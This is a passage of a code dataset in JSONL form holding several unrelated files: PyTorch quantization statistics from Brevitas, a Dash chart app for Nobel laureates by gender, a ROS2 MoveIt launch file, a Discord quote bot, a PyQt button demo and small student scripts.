dimension\n assert len(x.size()) == 2, \"Only 2-dim input is supported.\"\n other_dim = abs(self.stats_reduce_dim - 1)\n dim_slice = torch.narrow(x, dim=other_dim, start=0, length=1)\n # k is 1-indexed, so round away from zero\n k = int(math.ceil(.01 * self.q * dim_slice.numel()))\n result = x.kthvalue(k, dim=self.stats_reduce_dim).values\n result = torch.where(\n result <= self.zero().to(result.dtype), result, self.zero().to(result.dtype))\n return result\n\n\nclass PercentileInterval(brevitas.jit.ScriptModule):\n __constants__ = ['stats_reduce_dim', 'low_q', 'high_q']\n\n def __init__(\n self,\n low_percentile_q,\n high_percentile_q,\n stats_reduce_dim: Optional[int] = None) -> None:\n super(PercentileInterval, self).__init__()\n self.stats_reduce_dim = stats_reduce_dim\n self.low_q = low_percentile_q\n self.high_q = high_percentile_q\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor) -> Tensor:\n if self.stats_reduce_dim is None:\n low_k = int(math.ceil(.01 * self.low_q * x.numel()))\n # k is 1-indexed, so round away from zero\n high_k = int(math.floor(.01 * self.high_q * x.numel() + 0.5))\n low_result = x.view(-1).kthvalue(low_k).values\n high_result = x.view(-1).kthvalue(high_k).values\n else:\n # assuming x is two dimensional, get the other dimension\n assert len(x.size()) == 2, \"Only 2-dim input is supported.\"\n other_dim = abs(self.stats_reduce_dim - 1)\n dim_slice = torch.narrow(x, dim=other_dim, start=0, length=1)\n low_k = int(math.ceil(.01 * self.low_q * dim_slice.numel()))\n # k is 1-indexed, so round away from zero\n high_k = int(math.floor(.01 * self.high_q * dim_slice.numel() + 0.5))\n low_result = x.kthvalue(low_k, dim=self.stats_reduce_dim).values\n high_result = x.kthvalue(high_k, dim=self.stats_reduce_dim).values\n interval = high_result - low_result\n abs_interval = torch.abs(interval)\n return abs_interval\n\n\nclass AbsMax(brevitas.jit.ScriptModule):\n __constants__ = ['stats_reduce_dim']\n\n def __init__(self, stats_reduce_dim: Optional[int] = None) -> None:\n super(AbsMax, self).__init__()\n self.stats_reduce_dim = stats_reduce_dim\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor):\n if self.stats_reduce_dim is None:\n return torch.max(torch.abs(x))\n else:\n return torch.max(torch.abs(x), dim=self.stats_reduce_dim)[0]\n\n\nclass AbsMinMax(brevitas.jit.ScriptModule):\n __constants__ = ['stats_reduce_dim']\n\n def __init__(self, stats_reduce_dim: Optional[int] = None) -> None:\n super(AbsMinMax, self).__init__()\n self.stats_reduce_dim = stats_reduce_dim\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor):\n if self.stats_reduce_dim is None:\n return torch.abs(torch.max(x) - torch.min(x))\n else:\n max_val = torch.max(x, dim=self.stats_reduce_dim)[0]\n min_val = torch.min(x, dim=self.stats_reduce_dim)[0]\n return torch.abs(max_val - min_val)\n\n\nclass AbsMaxAve(brevitas.jit.ScriptModule):\n __constants__ = ['stats_reduce_dim']\n\n def __init__(self, stats_reduce_dim: int) -> None:\n super(AbsMaxAve, self).__init__()\n self.stats_reduce_dim = stats_reduce_dim\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor):\n return torch.mean(torch.max(torch.abs(x), dim=self.stats_reduce_dim)[0])\n\n\nclass AbsMaxL2(brevitas.jit.ScriptModule):\n __constants__ = ['stats_reduce_dim']\n\n def __init__(self, stats_reduce_dim: int) -> None:\n super(AbsMaxL2, self).__init__()\n self.stats_reduce_dim = stats_reduce_dim\n\n @brevitas.jit.script_method\n def forward(self, x: torch.Tensor):\n per_channel_max = torch.max(torch.abs(x), 
dim=self.stats_reduce_dim)[0]\n out = torch.norm(per_channel_max, p=2)\n out = out / math.sqrt(per_channel_max.view(-1).shape[0])\n return out\n\n\nclass AbsAve(brevitas.jit.ScriptModule):\n __constants__ = ['stats_reduce_dim']\n\n def __init__(self, stats_reduce_dim: Optional[int] = None) -> None:\n super(AbsAve, self).__init__()\n self.stats_reduce_dim = stats_reduce_dim\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor):\n if self.stats_reduce_dim is None:\n return torch.mean(torch.abs(x))\n else:\n return torch.mean(torch.abs(x), dim=self.stats_reduce_dim)\n\n\nclass MeanSigmaStd(brevitas.jit.ScriptModule):\n\n def __init__(\n self,\n sigma: float,\n stats_reduce_dim: Optional[int] = None,\n std_dev_epsilon: float = DEFAULT_STD_DEV_EPSILON) -> None:\n super(MeanSigmaStd, self).__init__()\n self.impl = _MeanSigmaStdImpl(stats_reduce_dim, std_dev_epsilon)\n self.sigma = StatelessBuffer(torch.tensor(sigma))\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor):\n sigma = self.sigma()\n out = self.impl(x, sigma)\n return out\n\n\nclass _MeanSigmaStdImpl(brevitas.jit.ScriptModule):\n __constants__ = ['stats_reduce_dim', 'output_shape', 'epsilon']\n\n def __init__(\n self,\n stats_reduce_dim: Optional[int] = None,\n std_dev_epsilon: float = DEFAULT_STD_DEV_EPSILON) -> None:\n super(_MeanSigmaStdImpl, self).__init__()\n self.stats_reduce_dim = stats_reduce_dim\n self.epsilon = std_dev_epsilon\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor, sigma: Tensor):\n abs_val = torch.abs(x)\n if self.stats_reduce_dim is None:\n mean_val = torch.mean(abs_val)\n std_val = torch.sqrt(torch.var(abs_val) + self.epsilon)\n else:\n mean_val = torch.mean(torch.abs(x), dim=self.stats_reduce_dim)\n std_val = torch.sqrt(torch.var(abs_val, dim=self.stats_reduce_dim) + self.epsilon)\n mean_val = mean_val.view(-1)\n std_val = std_val.view(-1)\n return mean_val + sigma * std_val\n\n\nclass MeanLearnedSigmaStd(brevitas.jit.ScriptModule):\n\n def __init__(\n self,\n sigma: float,\n stats_output_shape: Tuple[int, ...],\n stats_reduce_dim: Optional[int] = None,\n std_dev_epsilon: float = DEFAULT_STD_DEV_EPSILON) -> None:\n super(MeanLearnedSigmaStd, self).__init__()\n self.impl = _MeanSigmaStdImpl(stats_reduce_dim, std_dev_epsilon)\n if stats_output_shape == SCALAR_SHAPE:\n self.value = Parameter(torch.tensor(sigma))\n else:\n self.value = Parameter(torch.full(stats_output_shape, sigma))\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor):\n sigma = self.sigma.view(self.sigma.shape) # trick to get a tensor type\n out = self.impl(x, sigma)\n return out\n\n def _load_from_state_dict(\n self, state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys,\n error_msgs):\n value_key = prefix + 'sigma'\n retrocomp_value_key = prefix + 'learned_sigma'\n if retrocomp_value_key in state_dict: # retrocompatibility\n state_dict[value_key] = state_dict.pop(retrocomp_value_key)\n super(MeanLearnedSigmaStd, self)._load_from_state_dict(\n state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys, error_msgs)\n sigma_key = prefix + 'sigma'\n if config.IGNORE_MISSING_KEYS and sigma_key in missing_keys:\n missing_keys.remove(sigma_key)\n\n\nclass KLMinimizerThreshold(torch.nn.Module):\n \"\"\"\n Based on:\n https://github.com/apache/incubator-mxnet/blob/master/python/mxnet/contrib/quantization.py\n \"\"\"\n\n def __init__(self, signed, bit_width_impl, num_bins=1000 + 1, smoothing_eps=0.0001):\n super(KLMinimizerThreshold, self).__init__()\n self.num_bins = 
num_bins\n self.smoothing_eps = smoothing_eps\n self.signed = signed\n self.bit_width_impl = bit_width_impl\n self.absmax_impl = AbsMax()\n\n def smooth_normalize_distribution(self, p, eps):\n is_zeros = (p == 0).float()\n n_zeros = is_zeros.sum()\n n_nonzeros = torch.numel(p) - n_zeros\n if not n_nonzeros:\n return None\n eps1 = eps * n_zeros / n_nonzeros\n hist = p.float()\n hist += eps * is_zeros + (-eps1) * n_nonzeros\n dist = torch.distributions.categorical.Categorical(logits=hist)\n return dist\n\n def forward(self, x: Tensor):\n absmax = self.absmax_impl(x)\n bit_width = self.bit_width_impl()\n num_quantized_bins = max_int(self.signed, False, bit_width).int()\n thresholds = torch.zeros(self.num_bins // 2 + 1 - num_quantized_bins // 2, device=x.device)\n divergence = torch.zeros_like(thresholds)\n quantized_bins = torch.zeros(num_quantized_bins, device=x.device)\n hist = torch.histc(x, bins=self.num_bins, min=-absmax, max=absmax).int()\n hist_edges = torch.linspace(-absmax, absmax, self.num_bins + 1)\n for i in range(num_quantized_bins // 2, self.num_bins // 2 + 1):\n p_bin_idx_start = self.num_bins // 2 - i\n p_bin_idx_stop = self.num_bins // 2 + i + 1\n thresholds[i - num_quantized_bins // 2] = hist_edges[p_bin_idx_stop]\n sliced_nd_hist = hist[p_bin_idx_start:p_bin_idx_stop]\n p = sliced_nd_hist.clone()\n left_outlier_count = torch.sum(hist[0:p_bin_idx_start])\n p[0] += left_outlier_count\n right_outlier_count = torch.sum(hist[p_bin_idx_stop:])\n p[-1] += right_outlier_count\n is_nonzeros = (sliced_nd_hist != 0).float()\n num_merged_bins = torch.numel(p) // num_quantized_bins\n for j in range(num_quantized_bins):\n start = j * num_merged_bins\n stop = start + num_merged_bins\n quantized_bins[j] = sliced_nd_hist[start:stop].sum()\n quantized_bins[-1] += sliced_nd_hist[num_quantized_bins * num_merged_bins:].sum()\n q = torch.zeros_like(p, dtype=torch.float32, device=x.device)\n for j in range(num_quantized_bins):\n start = j * num_merged_bins\n if j == num_quantized_bins - 1:\n stop = -1\n else:\n stop = start + num_merged_bins\n norm = is_nonzeros[start:stop].sum()\n if norm != 0:\n q[start:stop] = quantized_bins[j] / norm\n q[sliced_nd_hist == 0] = 0.\n p = self.smooth_normalize_distribution(p, self.smoothing_eps)\n q = self.smooth_normalize_distribution(q, self.smoothing_eps)\n if q is None:\n divergence[i - num_quantized_bins // 2] = float('inf')\n else:\n divergence[i - num_quantized_bins // 2] = torch.distributions.kl.kl_divergence(p, q)\n min_divergence_idx = torch.argmin(divergence)\n opt_threshold = thresholds[min_divergence_idx]\n return opt_threshold\n\n\nclass L1Norm(brevitas.jit.ScriptModule):\n \"\"\"ScriptModule implementation to collect per-channel L1 normalization stats\n for weight normalization-based quantization.\"\"\"\n __constants__ = ['stats_reduce_dim']\n\n def __init__(self, stats_reduce_dim: Optional[int] = None) -> None:\n super(L1Norm, self).__init__()\n self.stats_reduce_dim = stats_reduce_dim\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor):\n if self.stats_reduce_dim is None:\n # Need to be able to return the max per-channel L1 norm as a scalar\n raise NotImplementedError(\"L1 normalization is not supported per-tensor yet.\")\n else:\n return x.norm(p=1, dim=self.stats_reduce_dim, keepdim=True)\n\n\nclass L2Norm(brevitas.jit.ScriptModule):\n \"\"\"ScriptModule implementation to collect per-channel L2 normalization stats\n for weight normalization-based quantization.\"\"\"\n __constants__ = ['stats_reduce_dim']\n\n def __init__(self, 
stats_reduce_dim: Optional[int] = None) -> None:\n super(L2Norm, self).__init__()\n self.stats_reduce_dim = stats_reduce_dim\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor):\n if self.stats_reduce_dim is None:\n # Need to be able to return the max per-channel L2 norm as a scalar\n raise NotImplementedError(\"L2 normalization is not supported per-tensor yet.\")\n else:\n return x.norm(p=2, dim=self.stats_reduce_dim, keepdim=True)\n","repo_name":"Xilinx/brevitas","sub_path":"src/brevitas/core/stats/stats_op.py","file_name":"stats_op.py","file_ext":"py","file_size_in_byte":15821,"program_lang":"python","lang":"en","doc_type":"code","stars":963,"dataset":"github-code","pt":"2"} +{"seq_id":"28431169987","text":"'''\ndef oszegzo(x, y):\n return x + y\n\n\nprint(oszegzo(9231239999, -1213123143))\n'''\nlist = [1, 6, 5]\ndef paros_E(x, *args):\n T = False\n for szam in list:\n if szam % 2 == 0:\n T = True\n if T:\n print(\"PÁÁÁROS\")\nparos_E(list)\n\n\n","repo_name":"kizsi2019/22_10D2","sub_path":"Uivárosi Gábriel/füg1.py","file_name":"füg1.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"43208359323","text":"import serial\n\nser = serial.Serial(port='/dev/ttyS0',baudrate=9600,parity=serial.PARITY_ODD,stopbits=serial.STOPBITS_TWO,bytesize=serial.SEVENBITS)\n\nif ser.isOpen():\n print('Opened!')\nelse:\n print('Closed!')\nser.close()\n\ncommand = input('Enter with a command\\n 1 - Open Shutter\\n 2 - Close Shutter\\n 3 - Get out\\n')\n\nif command == '1':\n print(\"Shutter Opened!\")\nif command == '2':\n print('Shutter Closed!')\nif command == '3':\n exit()\n\n","repo_name":"Blitzcranklenda/PySerial","sub_path":"#Shutter - Port Serial.py","file_name":"#Shutter - Port Serial.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"8960255792","text":"#!/usr/bin/env python\n# _*_ coding: utf-8 _*_\n# @author : mythwind \n# contact : 774202013@qq.com\n# @datetime : 2020/3/9 9:30 上午 \n# @File : pca_algorithm_demo.py\n# @desc :\nfrom utils import file_utils\nfrom utils import math_utils\nfrom pca import pca_algorithm\nimport numpy as np\n\n\ndef test_data():\n data_mat = file_utils.load_map_datamat(\"assets/testSet.txt\")\n lowd_mat, recon_mat = pca_algorithm.pca_dimen_reduce(data_mat, 1)\n print(np.shape(data_mat))\n print(np.shape(lowd_mat))\n pca_algorithm.plot_datamat(data_mat, lowd_mat, recon_mat)\n\ndef test_secom() :\n data_mat = file_utils.load_map_datamat(\"assets/secom.data\", ' ')\n data_mat = math_utils.replace_nan_with_mean(data_mat)\n pca_algorithm.show_secom_data(data_mat)\n\n\nif __name__ == '__main__':\n test_data()\n test_secom()\n","repo_name":"mythwind/machine-learning-python3","sub_path":"venv/src/machine/pca/pca_algorithm_demo.py","file_name":"pca_algorithm_demo.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"72272548848","text":"from PyQt5.Qt import *\nimport sys\n\napp = QApplication(sys.argv)\n\nwindow = QWidget()\nwindow.setWindowTitle(\"hahahahah\")\nwindow.resize(500, 500)\n\nbut = QPushButton(QIcon(\"./logo.png\"), \"button\", window)\n\nbut1 = QPushButton(QIcon(\"./logo.png\"), \"button1\", window)\nbut1.move(0, 60)\nbut1.pressed.connect(lambda: print(\"默认按钮\"))\n\n# but1.setAutoDefault(True) 
#设置默认按钮,选择了之后就会高亮显示,用enter和空格键可以控制\nprint(but1.autoDefault())\n\nbut1.setDefault(True) # 设置默认按钮,用enter和空格键可以控制\nprint(but1.isDefault())\n\nwindow.show()\n\n# but.showMenu() #打开时打开菜单\nsys.exit(app.exec_())\n","repo_name":"guanzejie/PyQt_Note","sub_path":"PyQt_31_QAPushButton_设置默认按钮.py","file_name":"PyQt_31_QAPushButton_设置默认按钮.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"9296191142","text":"# from turtle import tilt, title\nfrom pydoc import classname\nimport pandas as pd\nimport json\nfrom dash import Dash, html, dcc, Input, Output\nimport plotly.express as px\nimport plotly.graph_objects as go\nimport numpy as np\nimport requests\n\napp = Dash(__name__)\n\n# reading the data from json file for prize winners\nfile = open('./laureate.json')\nlaureates = json.load(file)['laureates']\nfile.close()\n\n# reading the data from json file for country code\nfile = open('./country.json')\ncountries = json.load(file)['countries']\nfile.close()\n\n# result = requests.get('https://api.nobelprize.org/v1/laureate.json')\n# laureates = result.json()['laureates']\n\n# result = requests.get('http://api.nobelprize.org/v1/country.json')\n# country = result.json()['countries']\n\n\n# making it into a dataframe\nlaureates = pd.DataFrame(laureates)\ncountries = pd.DataFrame(countries)\n\n# converting to a datframe of required datas\nname = []\ncountry = []\ndiedCountry = []\ngender = []\nprizeYear = []\nprizeCategory = []\n\nfor i,item in laureates.iterrows():\n for j in item['prizes']:\n if pd.isna(item['surname']) :\n name.append(item['firstname'])\n else:\n name.append(item['firstname']+' '+item['surname'])\n \n if pd.isna(item['bornCountryCode']):\n country.append('International')\n else:\n country.append(countries[countries['code'] == item['bornCountryCode']].name.iloc[0])\n\n gender.append(item['gender'])\n prizeYear.append(j['year'])\n prizeCategory.append(j['category'])\n\ndf = pd.DataFrame({\n 'name':name,\n 'country':country,\n 'gender':gender,\n 'prizeYear':prizeYear,\n 'prizeCategory':prizeCategory\n}).sort_values(by='prizeYear').reset_index(drop=True)\n\n# adding count column to use scatter plot to make dot matrix plot\ncountArr = []\ncount = -1\ntemp = 0\nfor i in range(len(df)):\n if df['prizeYear'].iloc[i] != temp:\n count = -1\n temp = df['prizeYear'].iloc[i]\n\n count = count + 1\n countArr.append(count)\ndf['count'] = countArr\n\n# scatter graph\nscatter_fig = px.scatter(df, x='prizeYear', y='count', color='gender', symbol='gender', hover_name='name')\nscatter_fig.update_layout(\n xaxis_title=\"Years\",\n yaxis_title=\"Number of Winners\",\n legend_title=\"Gender\",\n font=dict(\n family=\"Courier New, monospace\",\n size=14,\n color=\"RebeccaPurple\"\n )\n)\n\n# histogram graph\nhistogram_fig = px.histogram(df, x='prizeCategory', color='gender')\nhistogram_fig.update_layout(\n xaxis_title=\"Prize Category\",\n yaxis_title=\"Number of Winners\",\n legend_title=\"Gender\",\n font=dict(\n family=\"Courier New, monospace\",\n size=14,\n color=\"RebeccaPurple\"\n )\n)\n\n# preparing cummulative data\nmale = df[df['gender']=='male']\nfemale = df[df['gender']=='female']\norg = df[df['gender']=='org']\n\nmale = male.groupby('prizeYear')['count'].count().reset_index()\nmaleYear = male['prizeYear']\nmaleCummSum = np.array(male['count']).cumsum()\n\nfemale = female.groupby('prizeYear')['count'].count().reset_index()\ntempYear = []\ntempCount = []\nfor i,item in male.iterrows():\n if 
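# --- Added note on the dot-matrix `count` column built in app.py above ---
# The manual loop that restarts a counter whenever prizeYear changes is,
# assuming the frame is already sorted by prizeYear, equivalent to pandas'
# groupby(...).cumcount(); a tiny hypothetical check:
import pandas as pd

demo = pd.DataFrame({'prizeYear': ['1901', '1901', '1902'], 'name': ['a', 'b', 'c']})
demo = demo.sort_values('prizeYear').reset_index(drop=True)
demo['count'] = demo.groupby('prizeYear').cumcount()  # 0, 1, then 0 again
print(demo)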
len(female[female['prizeYear'] == item['prizeYear']]) == 0:\n tempYear.append(item['prizeYear'])\n tempCount.append(0)\n else:\n tempYear.append(female[female['prizeYear'] == item['prizeYear']].iloc[0]['prizeYear'])\n tempCount.append(female[female['prizeYear'] == item['prizeYear']].iloc[0]['count'])\nfemale = pd.DataFrame({'prizeYear':tempYear, 'count':tempCount})\nfemaleYear = female['prizeYear']\nfemaleCummSum = np.array(female['count']).cumsum()\n\norg = org.groupby('prizeYear')['count'].count().reset_index()\ntempYear = []\ntempCount = []\nfor i,item in male.iterrows():\n if len(org[org['prizeYear'] == item['prizeYear']]) == 0:\n tempYear.append(item['prizeYear'])\n tempCount.append(0)\n else:\n tempYear.append(org[org['prizeYear'] == item['prizeYear']].iloc[0]['prizeYear'])\n tempCount.append(org[org['prizeYear'] == item['prizeYear']].iloc[0]['count'])\norg = pd.DataFrame({'prizeYear':tempYear, 'count':tempCount})\norgYear = org['prizeYear']\norgCummSum = np.array(org['count']).cumsum()\n\n# line graph\nline_fig = go.Figure()\nline_fig.add_trace(go.Scatter(x=maleYear, y=maleCummSum, name='Male'))\nline_fig.add_trace(go.Scatter(x=femaleYear, y=femaleCummSum, name='Female'))\nline_fig.add_trace(go.Scatter(x=orgYear, y=orgCummSum, name='Org'))\n\nline_fig.update_layout(\n xaxis_title=\"Years\",\n yaxis_title=\"Number of Winners\",\n legend_title=\"Gender\",\n font=dict(\n family=\"Courier New, monospace\",\n size=14,\n color=\"RebeccaPurple\"\n )\n)\n\n\n# default\ntab1_fig = scatter_fig\n\n# female percentage\nfp = (len(df[df['gender']=='female'])/len(df))*100\n\napp.layout = html.Div(children=[\n \n html.Div(className='heading',children=[\n html.H1(children='Noble Laueretes'),\n html.P(children='A Quick Look at Nobel Prize winners till now based on Gender')\n ]),\n\n dcc.Tabs(id='tabGroup',children=[\n dcc.Tab(\n label='Over the Years',\n children=[\n html.Div(className='subHeading',children=[\n html.H2(children='Winners over the Years based on Gender'),\n html.P(children=[\n html.Span(children='*'),\n 'Gender contains male, female or Organization'\n ])\n ]),\n\n html.Div(className='insight',children=[\n html.H4(children='Few Insights:'), \n html.Ul(children=[\n html.Li(children=f'Only {str(fp)[:4]}% of winners are women!'),\n html.Li(children='Marie Curie is the first woman to Nobel Prize'),\n html.Li(children='Red cross is the only Organization to win Nobel Prize 3 times in 1917, 1944 and 1963')\n\n ])\n \n ]),\n\n html.Div(id='scatter-plot',children=[\n dcc.Dropdown(['Normal','Cumulative'], 'Normal', id='tab1_dropDown'),\n dcc.Graph(\n id='tab1-grpah',\n figure=tab1_fig\n )\n ]),\n\n ]\n ),\n dcc.Tab(\n label='In different Categories',\n children=[\n html.Div(className='subHeading',children=[\n html.H2(children='Winners in different Categories based on Gender'),\n html.P(children=[\n html.Span(children='*'),\n 'Gender contains male, female or Organization'\n ])\n ]),\n\n html.Div(className='insight',children=[\n html.H4(children='Few Insights:'), \n html.Ul(children=[\n html.Li(children='The Physics and the Economics Prizes has only 2% women Winners.'),\n html.Li(children='There are 224 Nobel Prize winners for Medicine')\n ])\n \n ]),\n\n dcc.Graph(\n id='histogram-plot',\n figure=histogram_fig\n )\n\n ]\n )\n ])\n \n])\n\n\n\n@app.callback(\n Output('tab1-grpah','figure'),\n Input('tab1_dropDown', 'value')\n)\ndef updateGraph(value):\n if value == 'Normal':\n tab1_fig = scatter_fig\n else:\n tab1_fig = line_fig\n \n return tab1_fig\n\n\n\nif __name__ == '__main__':\n \n 
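# --- Added note on the cumulative-count preparation above ---
# The three fill-the-missing-years loops for male/female/org can be collapsed,
# assuming the same inputs, into one unstack + reindex + cumsum chain:
import pandas as pd

demo = pd.DataFrame({'prizeYear': ['1901', '1901', '1903'],
                     'gender': ['male', 'female', 'male']})
years = sorted(demo['prizeYear'].unique())
cumulative = (demo.groupby(['prizeYear', 'gender']).size()
                  .unstack(fill_value=0)
                  .reindex(years, fill_value=0)
                  .cumsum())
print(cumulative)  # one ready-to-plot column per gender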
app.run_server(debug=False, port=8050) \n ","repo_name":"thomasdevasia/DAV_21099593","sub_path":"python/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"10061724792","text":"import os\nfrom ament_index_python import get_package_share_directory\nfrom launch import LaunchDescription\nfrom launch.actions import DeclareLaunchArgument, IncludeLaunchDescription\nfrom launch.substitutions import Command, FindExecutable, LaunchConfiguration, PathJoinSubstitution\nfrom launch_ros.actions import Node\nfrom launch_ros.substitutions import FindPackageShare\nfrom launch.actions import IncludeLaunchDescription\nfrom launch.launch_description_sources import PythonLaunchDescriptionSource\nimport launch_ros\n\nfrom launch.actions import TimerAction\nfrom launch.conditions import IfCondition\n\nfrom moveit_configs_utils.launch_utils import (\n DeclareBooleanLaunchArg,\n)\nfrom moveit_configs_utils import MoveItConfigsBuilder\n\n\ndef generate_launch_description():\n moveit_config = MoveItConfigsBuilder(\n \"prbt\", package_name=\"prbt_robot_moveit_config\"\n ).to_moveit_configs()\n declared_arguments = []\n \n declared_arguments.append(\n DeclareLaunchArgument(\n \"can_interface\",\n default_value=\"can0\",\n description=\"Interface name for can\",\n )\n )\n \n robot_hw_node = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(\n [PathJoinSubstitution([FindPackageShare(\"prbt_robot_support\"), \"launch\", \"robot.launch.py\"])],\n ),\n launch_arguments={\n \"can_interface\": LaunchConfiguration(\"can_interface\"),\n \"use_ros2_control\": \"true\",\n }.items(),\n )\n\n # todo: remove this once joint_state_broadcast from controller is fixed\n state_publisher = Node(\n package=\"joint_state_publisher\",\n name=\"joint_state_publisher\",\n executable=\"joint_state_publisher\",\n parameters=[{\n \"source_list\": [\n \"/prbt_joint_1/joint_states\",\n \"/prbt_joint_2/joint_states\",\n \"/prbt_joint_3/joint_states\",\n \"/prbt_joint_4/joint_states\",\n \"/prbt_joint_5/joint_states\",\n \"/prbt_joint_6/joint_states\",\n \"/prbt_joint_7/joint_states\",\n ],\n \"rate\": 10\n }]\n )\n\n virtual_joints = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(\n str(\n moveit_config.package_path / \"launch/static_virtual_joint_tfs.launch.py\"\n )\n ),\n )\n\n # Given the published joint states, publish tf for the robot links\n\n move_group = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(\n str(moveit_config.package_path / \"launch/move_group.launch.py\")\n ),\n )\n\n spawn_controllers = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(\n str(moveit_config.package_path / \"launch/spawn_controllers.launch.py\")\n ),\n )\n\n # Run Rviz and load the default config to see the state of the move_group node\n\n rviz = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(\n str(moveit_config.package_path / \"launch/moveit_rviz.launch.py\")\n ),\n )\n\n # If database loading was enabled, start mongodb as well\n db = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(\n str(moveit_config.package_path / \"launch/warehouse_db.launch.py\")\n ),\n )\n\n node_list = [\n robot_hw_node,\n #state_publisher,\n TimerAction(\n period=10.0,\n actions=[virtual_joints]\n ),\n # TimerAction(\n # period=12.0,\n # actions=[spawn_controllers]\n # ),\n TimerAction(\n period=15.0,\n actions=[move_group]\n ),\n TimerAction(\n period=20.0,\n actions=[rviz]\n )\n ]\n\n return 
LaunchDescription(declared_arguments + node_list)\n\n ","repo_name":"ipa-cmh/prbt_robot","sub_path":"prbt_robot_moveit_config/launch/moveit_planning_execution.launch.py","file_name":"moveit_planning_execution.launch.py","file_ext":"py","file_size_in_byte":3805,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"39977467745","text":"import discord\nimport os\nfrom magnuswebserver import keep_alive\nimport discord,random,asyncio\nfrom discord.ext import commands\nfrom discord.ext import tasks, commands\nimport requests\nimport json\n\nmagnus = discord.Client()\n\ndef get_quote():\n response = requests.get(\"https://zenquotes.io/api/random\")\n json_data = json.loads(response.text)\n quote = \"\\\"\" + json_data[0][\"q\"] + \"\\\" - \" + json_data[0][\"a\"]\n return quote\n\n# use client.event decorator to register an event. In the discord.py library, things are done with \"call backs\".\n\n@magnus.event\nasync def on_ready(): \n \"\"\"Calls when the bot is ready for use\"\"\"\n await magnus.change_presence(activity=discord.Game(name=\"Chess\"))\n sendmessage.start()\n sendmessage1.start()\n \n print(\"Bot has logged in as {0.user}\".format(magnus))\n\n@magnus.event\nasync def on_message(message):\n \"\"\"Calls each time a message is received\"\"\"\n if message.author == magnus.user: # If the message is from the bot itself, do nothing.\n return\n\n if message.content.startswith(\"$himagnus\"): # We use say that \"$info\" in a bot command for Carlsen Bot\n await message.channel.send(\"Hello! My name is Magnus Carlsen, and I'm here to explain the rules of this Discord Server! Please type \\\"$rules\\\" for more information!\")\n\n if message.content.startswith(\"$rules\"):\n await message.channel.send(\" The rules are very simple: \\n - Please be respectful. 
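# --- Added note on the TimerAction staggering in the prbt launch file above ---
# A self-contained sketch of the same delayed-start pattern with stand-in
# processes (hypothetical echo commands, not the prbt nodes):
from launch import LaunchDescription
from launch.actions import ExecuteProcess, TimerAction

def generate_launch_description():
    first = ExecuteProcess(cmd=['echo', 'first'], output='screen')
    second = ExecuteProcess(cmd=['echo', 'second'], output='screen')
    # `second` starts 5 s after launch, mirroring the staggered
    # virtual_joints -> move_group -> rviz startup above
    return LaunchDescription([first, TimerAction(period=5.0, actions=[second])])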
\\n - Please follow Lagno's list of rules \\n That's all!\")\n\n if message.content.startswith(\"$merrychristmas\"):\n await message.channel.send(\"Merry Christmas Everyone!\")\n\n@tasks.loop(seconds=196400)\nasync def sendmessage():\n channel = magnus.get_channel(890990298585497687)\n quote = get_quote()\n await channel.send(quote)\n\n@tasks.loop(seconds=143200)\nasync def sendmessage1():\n channel = magnus.get_channel(905136842599432223)\n await channel.send(\"-puzzle\", delete_after=10)\n\n\n# Run the bot script (inside the parameter for the run() function we need to put our token for the bot (bot token))\nkeep_alive()\n\n\n# We can use an \"Environment Variable\"\nmagnus_token = os.environ['magnus']\nmagnus.run(magnus_token)\n\n# Setting `Playing ` status\n# await bot.change_presence(activity=discord.Game(name=\"a game\"))\n\n# Setting `Streaming ` status\n# await bot.change_presence(activity=discord.Streaming(name=\"My Stream\", url=my_twitch_url))\n\n# Setting `Listening ` status\n# await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name=\"a song\"))\n\n# Setting `Watching ` status\n# await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=\"a movie\"))\n\n\n\"\"\"\n\n@tasks.loop(seconds=40) # How often the bot should change status, mine is set on every 40 seconds\nasync def changepresence():\n global x\n\n game = iter(\n [\n \"Status 1\",\n \"Status 2\",\n \"Status 3\",\n \"Status 4\",\n \"Status 5?\",\n \"Status 6\",\n ]\n ) # Every line above ^^ is one new status the bot can have\n for x in range(random.randint(1, 6)): # Here you write the total of different status you have for the bot, I have 6 and that's why I have number 6 there. This makes it a 16.666% chance to change status every 40 second\n x = next(game)\n await bot.change_presence(activity=discord.Game(name=x))\n\n\"\"\"\n\n","repo_name":"alanknguyen314/discordbots","sub_path":"carlsenbot.py","file_name":"carlsenbot.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"24383319764","text":"class Stack:\n def __init__(self, my_string):\n self.my_list = LinkedList()\n self.my_string = my_string\n \n \n def checkBalance(self):\n curr_position = position_first_open = 0\n open = ['(', '[', '{']\n close = [')', ']', '}'] \n \n for char in self.my_string:\n curr_position += 1\n if char in open:\n if 